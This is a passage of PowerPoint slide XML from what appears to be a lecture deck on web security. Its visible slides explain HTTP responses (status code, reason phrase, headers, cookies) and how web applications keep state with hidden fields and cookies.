              <a:t> code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="851284" lvl="1" indent="-495684" algn="l" defTabSz="467359">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3680"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Headers</a:t>
            </a:r>
            <a:r>
              <a:t> describing what the server provides</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="851284" lvl="1" indent="-495684" algn="l" defTabSz="467359">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3680" b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="851284" lvl="1" indent="-495684" algn="l" defTabSz="467359">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3680"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Cookies</a:t>
            </a:r>
            <a:r>
              <a:t> (much more on these later)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1206884" lvl="2" indent="-495684" algn="l" defTabSz="467359">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3680"/>
            </a:pPr>
            <a:r>
              <a:t>Represent s</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>tate</a:t>
            </a:r>
            <a:r>
              <a:t> the server would like the browser to store on its behalf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="234" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9419239" y="3698308"/>
            <a:ext cx="5545523" cy="1115057"/>
            <a:chOff x="0" y="2976"/>
            <a:chExt cx="5545522" cy="1115056"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="232" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1118033"/>
              <a:ext cx="5545523" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="1524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233" name="HTTP Response"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="401036" y="2976"/>
              <a:ext cx="4743451"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HTTP Response</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Basic structure of web traffic"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4726817" y="449537"/>
            <a:ext cx="15609095" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="496570">
              <a:defRPr sz="9520"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Basic</a:t>
            </a:r>
            <a:r>
              <a:t> structure of web traffic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3937301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2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advAuto="0"/>
      <p:bldP spid="231" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="234" grpId="0"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6" name="Screen Shot 2014-02-18 at 3.27.40 AM.png" descr="Screen Shot 2014-02-18 at 3.27.40 AM.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4584209" y="3567105"/>
            <a:ext cx="14476727" cy="7969408"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4635889" y="3555745"/>
            <a:ext cx="14441008" cy="9318573"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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240" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4641587" y="11767240"/>
            <a:ext cx="13139222" cy="1009199"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="13139220" cy="1009197"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="238" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="54462" y="0"/>
              <a:ext cx="13084759" cy="1009198"/>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239" name="&lt;html&gt; …… &lt;/html&gt;"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="52161"/>
              <a:ext cx="6633630"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a:solidFill>
                    <a:srgbClr val="FEFEFE"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:ea typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                  <a:sym typeface="Courier"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>&lt;html&gt; …… &lt;/html&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="255" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2998840" y="1213290"/>
            <a:ext cx="7435155" cy="11824512"/>
            <a:chOff x="16697" y="5953"/>
            <a:chExt cx="7435153" cy="11824511"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="241" name="Headers"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="-187190" y="6092572"/>
              <a:ext cx="2661779"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Headers</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="242" name="Data"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="377736" y="10612064"/>
              <a:ext cx="153192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Data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="246" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="16697" y="315836"/>
              <a:ext cx="2950970" cy="2542895"/>
              <a:chOff x="16697" y="5953"/>
              <a:chExt cx="2950969" cy="2542893"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="243" name="HTTP…"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="16697" y="5953"/>
                <a:ext cx="2414352" cy="1666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defRPr b="1">
                    <a:solidFill>
                      <a:schemeClr val="accent5"/>
                    </a:solidFill>
                    <a:latin typeface="Helvetica"/>
                    <a:ea typeface="Helvetica"/>
                    <a:cs typeface="Helvetica"/>
                    <a:sym typeface="Helvetica"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:t>HTTP</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:defRPr b="1">
                    <a:solidFill>
                      <a:schemeClr val="accent5"/>
                    </a:solidFill>
                    <a:latin typeface="Helvetica"/>
                    <a:ea typeface="Helvetica"/>
                    <a:cs typeface="Helvetica"/>
                    <a:sym typeface="Helvetica"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:t>version</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="244" name="Rounded Rectangle"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1713907" y="2068096"/>
                <a:ext cx="1253760" cy="480751"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 18545"/>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245" name="Line"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1377088" y="1562934"/>
                <a:ext cx="453495" cy="523450"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="63500" cap="flat">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="250" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2610536" y="5953"/>
              <a:ext cx="2272656" cy="2848998"/>
              <a:chOff x="15811" y="5953"/>
              <a:chExt cx="2272655" cy="2848997"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="247" name="Status…"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="15811" y="5953"/>
                <a:ext cx="2272656" cy="1666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defRPr b="1">
                    <a:solidFill>
                      <a:schemeClr val="accent5"/>
                    </a:solidFill>
                    <a:latin typeface="Helvetica"/>
                    <a:ea typeface="Helvetica"/>
                    <a:cs typeface="Helvetica"/>
                    <a:sym typeface="Helvetica"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:t>Status</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:defRPr b="1">
                    <a:solidFill>
                      <a:schemeClr val="accent5"/>
                    </a:solidFill>
                    <a:latin typeface="Helvetica"/>
                    <a:ea typeface="Helvetica"/>
                    <a:cs typeface="Helvetica"/>
                    <a:sym typeface="Helvetica"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:t>code</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="248" name="Rounded Rectangle"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="453519" y="2374200"/>
                <a:ext cx="557363" cy="480751"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 18545"/>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249" name="Line"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="756410" y="1577367"/>
                <a:ext cx="262768" cy="753046"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="63500" cap="flat">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="254" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3605968" y="157195"/>
              <a:ext cx="3845883" cy="2693977"/>
              <a:chOff x="0" y="5953"/>
              <a:chExt cx="3845882" cy="2693975"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="251" name="Reason…"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1220070" y="5953"/>
                <a:ext cx="2625813" cy="1666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defRPr b="1">
                    <a:solidFill>
                      <a:schemeClr val="accent5"/>
                    </a:solidFill>
                    <a:latin typeface="Helvetica"/>
                    <a:ea typeface="Helvetica"/>
                    <a:cs typeface="Helvetica"/>
                    <a:sym typeface="Helvetica"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:t>Reason</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:defRPr b="1">
                    <a:solidFill>
                      <a:schemeClr val="accent5"/>
                    </a:solidFill>
                    <a:latin typeface="Helvetica"/>
                    <a:ea typeface="Helvetica"/>
                    <a:cs typeface="Helvetica"/>
                    <a:sym typeface="Helvetica"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:t>phrase</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="252" name="Rounded Rectangle"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="2219177"/>
                <a:ext cx="474641" cy="480752"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 18784"/>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253" name="Line"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="446076" y="1625704"/>
                <a:ext cx="1025917" cy="725573"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="63500" cap="flat">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="256" name="HTTP responses"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9147248" y="505963"/>
            <a:ext cx="13633936" cy="193606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lvl1pPr>
              <a:defRPr sz="11200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>HTTP responses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="257" name="Line" descr="Line"/>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="730766" y="7494365"/>
            <a:ext cx="7454406" cy="436992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102497681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7" name="Web-based State using Hidden Fields and Cookies"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="508254">
              <a:defRPr sz="9744"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Web-based State using Hidden Fields and Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1672315355"/>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2" name="Maintaining State"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4387177" y="444976"/>
            <a:ext cx="15609095" cy="1936069"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Maintaining State</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="443" name="Web application maintains ephemeral state"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4399806" y="7281604"/>
            <a:ext cx="15609095" cy="1936069"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Web application maintains </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>ephemeral</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> state</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="444" name="Browser"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5840279" y="3652780"/>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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="445" name="Web server"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14905696" y="3652780"/>
            <a:ext cx="3637475" cy="2678908"/>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Web server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446" name="Client"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6769697" y="2564475"/>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447" name="Server"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15729938" y="2564475"/>
            <a:ext cx="19900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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="450" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9418963" y="4864467"/>
            <a:ext cx="5545523" cy="1115058"/>
            <a:chOff x="0" y="2976"/>
            <a:chExt cx="5545522" cy="1115056"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="448" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1118033"/>
              <a:ext cx="5545523" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="1524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449" name="HTTP Response"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="401036" y="2976"/>
              <a:ext cx="4743451"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HTTP Response</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="453" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9418963" y="3482383"/>
            <a:ext cx="5545523" cy="1115057"/>
            <a:chOff x="0" y="2976"/>
            <a:chExt cx="5545522" cy="1115056"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="451" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1118033"/>
              <a:ext cx="5545523" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="152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452" name="HTTP Request"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="648051" y="2976"/>
              <a:ext cx="4249421"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HTTP Request</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="454" name="State"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15822942" y="5327545"/>
            <a:ext cx="1804084" cy="1118034"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 17039"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>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State</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="455" name="State"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6756974" y="5327545"/>
            <a:ext cx="1804083" cy="1118034"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 17039"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>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State</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="456" name="Two kinds of state: hidden fields, and cookies"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4836646" y="11306339"/>
            <a:ext cx="13477313" cy="90488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spcBef>
                <a:spcPts val="4200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:t>Two kinds of state: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>hidden fields</a:t>
            </a:r>
            <a:r>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="457" name="Server processing often produces intermediate results…"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4403526" y="8103027"/>
            <a:ext cx="15548356" cy="1450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1064106" lvl="1" indent="-619606" algn="l">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4600"/>
            </a:pPr>
            <a:r>
              <a:t>Server processing often produces intermediate results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1481666" lvl="2" indent="-592666" algn="l">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="-"/>
              <a:defRPr sz="3600"/>
            </a:pPr>
            <a:r>
              <a:t>Not ACID, long-lived state</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="458" name="Send such state to the client"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4378014" y="9407174"/>
            <a:ext cx="9043556" cy="841384"/>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1064106" lvl="1" indent="-619606" algn="l">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4600"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Send</a:t>
            </a:r>
            <a:r>
              <a:t> such </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>state to the client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="459" name="Client returns the state in subsequent responses"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4374549" y="10174590"/>
            <a:ext cx="14401507" cy="841384"/>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1064106" lvl="1" indent="-619606" algn="l">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4600"/>
            </a:pPr>
            <a:r>
              <a:t>Client </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>returns the state</a:t>
            </a:r>
            <a:r>
              <a:t> in subsequent </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>responses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187809008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5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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="9" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="453"/>
